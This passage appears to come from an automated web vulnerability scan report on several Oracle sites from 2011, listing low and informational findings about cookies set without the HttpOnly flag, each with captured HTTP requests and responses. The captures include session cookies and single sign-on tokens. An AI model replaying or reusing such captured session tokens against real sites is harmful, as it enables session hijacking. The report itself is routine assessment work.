Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:52 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

6.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-upload-file.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2768
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...

6.7. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/IrcVisitor.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OA_HTML/IrcVisitor.jsp HTTP/1.1
Host: irecruitment.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=aI-seAnN7gYCF5vKSizOZg..
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=7edb662ed98453aac9dc9b74d3c9b8937d8701988a5259b0428b92ef860b014a.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Set-Cookie: GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/
Connection: Close
Content-Length: 774
Date: Mon, 17 Oct 2011 02:33:27 GMT
Set-Cookie: BIGipServergsiap_irecruitment_http=1527616141.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW
...[SNIP]...

6.8. https://irecruitment.oracle.com/OA_HTML/OA.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/OA.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OA_HTML/OA.jsp?OAFunc=IRC_VIS_ADV_JOB_SEARCH_PAGE&_ti=209088196&oapc=2&oas=c63Ec25IXJtclVMeE1fbdA.. HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisHomePG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.location%25253D%252527OA.jsp%25253FOAFunc%25253DIRC_VIS_ADV_JOB_SEARCH_PAGE%252526_ti%25253D209088196%252526oa%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Content-Length: 23021
Date: Mon, 17 Oct 2011 12:23:23 GMT
Content-Location: https://irecruitment.oracle.com/OA_HTML/OA.jsp


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html dir="ltr" lang="en-US-ORACLE9I"><head><title>Available Jobs</title><meta name="generator" content="Oracl
...[SNIP]...

6.9. https://irecruitment.oracle.com/OA_HTML/RF.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/RF.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA.. HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 46433
Set-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Date: Mon, 17 Oct 2011 12:22:56 GMT
Content-Location: https://irecruitment.oracle.com/OA_HTML/OA.jsp


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html dir="ltr" lang="en-US-ORACLE9I"><head><title>iRecruitment Visitor Home Page</title><meta name="generator
...[SNIP]...

6.10. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://oraclestore.oracle.com
Path:   /OA_HTML/ibeCAcpSSOLogin.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OA_HTML/ibeCAcpSSOLogin.jsp HTTP/1.1
Host: oraclestore.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp&langCode=US
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=e777ccf7edc8301890cff82302c6164caa5fbe274fbcd6b64f26c589fd7e206f.e34Qb38Qax0Obi0La3mQaxaObNuNe0; path=/OA_HTML; secure
Set-Cookie: GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/
Set-Cookie: GSI_pses=ZG3E0DB19D7D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML
Connection: Close
Content-Length: 741
Date: Mon, 17 Oct 2011 02:34:04 GMT
Set-Cookie: BIGipServergsiap_store_http=1510838925.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore
...[SNIP]...

6.11. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

6.12. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

6.13. https://login.oracle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 11:44:39 GMT
Content-Length: 1214
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

6.14. https://login.oracle.com/mysso/signon.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Content-Length: 2922
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

site2pstoretoken=v1.2%7E656BF073%7EF67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 17 Oct 2011 11:44:39 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000JCHge886MQK6EVaAUS1EaweP001nsg
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Content-Length: 15157


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...

6.15. https://login.oracle.com/mysso/sso_loginui/b-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 51
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgeuk6MQK6EVaAUS1EaweP001nuQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a...................!.......,..............P.;

6.16. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
